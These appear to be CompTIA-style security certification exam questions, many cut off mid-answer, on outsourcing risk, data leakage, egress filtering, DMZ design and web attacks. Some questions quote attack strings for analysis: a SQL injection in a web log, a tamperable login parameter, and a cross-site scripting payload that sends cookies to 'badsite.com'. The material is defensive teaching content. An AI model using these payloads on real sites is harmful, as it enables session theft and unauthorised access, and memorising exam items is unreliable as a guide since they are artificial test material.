The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. Functions to be outsourced include: business analysts, testing, software development and back office functions that deal with the processing of customer data. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. Which of the following risks are MOST likely to occur if adequate controls are not implemented?

A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO).

An organization uses IP address block 203.0.113.0/24 on its internal network. At the border router, the network administrator sets up rules to deny packets with a source address in this subnet from entering the network, and to deny packets with a destination address in this subnet from leaving the network. Which of the following is the administrator attempting to prevent?

Ann is testing the robustness of a marketing website through an intercepting proxy. She has intercepted the following HTTP request:

POST /login.aspx HTTP/1.1
Host: comptia.org
Content-type: text/html

txtUsername=ann&txtPassword=ann&alreadyLoggedIn=false&submit=true

Which of the following should Ann perform to test whether the website is susceptible to a simple authentication bypass?
A. Remove all of the post data...

Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Which of the following security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO).
A. Jail broken mobile device
B...

A security administrator sees the following line in a web server log:

235.62.11 "GET /site/script.php?user=admin&pass=pass%20or%201=1 HTTP/1.1" 200 5724

Given this log, which of the following is the security administrator concerned with and which fix should be implemented by the developer?
A. The security administrator is concerned with nonprintable characters being used to gain administrative access, and the developer should strip all nonprintable characters.
B. The...

Which of the following describes a risk and mitigation associated with cloud data storage?
A. Risk: Shared hardware caused data leakage. Mitigation: Strong encryption at rest
B. Risk: Offsite replication. Mitigation: Multi-site backups
C. Risk: Data loss from de-duplication. Mitigation: Dynamic host bus addressing
D. Risk: Combined data archiving. Mitigation: Two-factor administrator authentication

The senior security administrator wants to redesign the company DMZ to minimize the risks associated with both external and internal threats. The DMZ design must support security in depth, change management and configuration processes, and support incident reconstruction. Which of the following designs BEST supports the given requirements?
A. A dual firewall DMZ with...

The risk manager has requested a security solution that is centrally managed, can easily be updated, and protects end users’ workstations from both known and unknown malicious attacks when connected to either the office or home network. Which of the following would BEST meet this requirement?
A. HIPS
B. UTM
C. Antivirus
D. NIPS
E...

A security administrator notices the following line in a server’s security log:

<input name=’credentials’ type=’TEXT’ value=’" +request.getParameter (‘><script>document.location=’http://badsite.com/?q=’document.cookie</script>’)+’;

The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this...
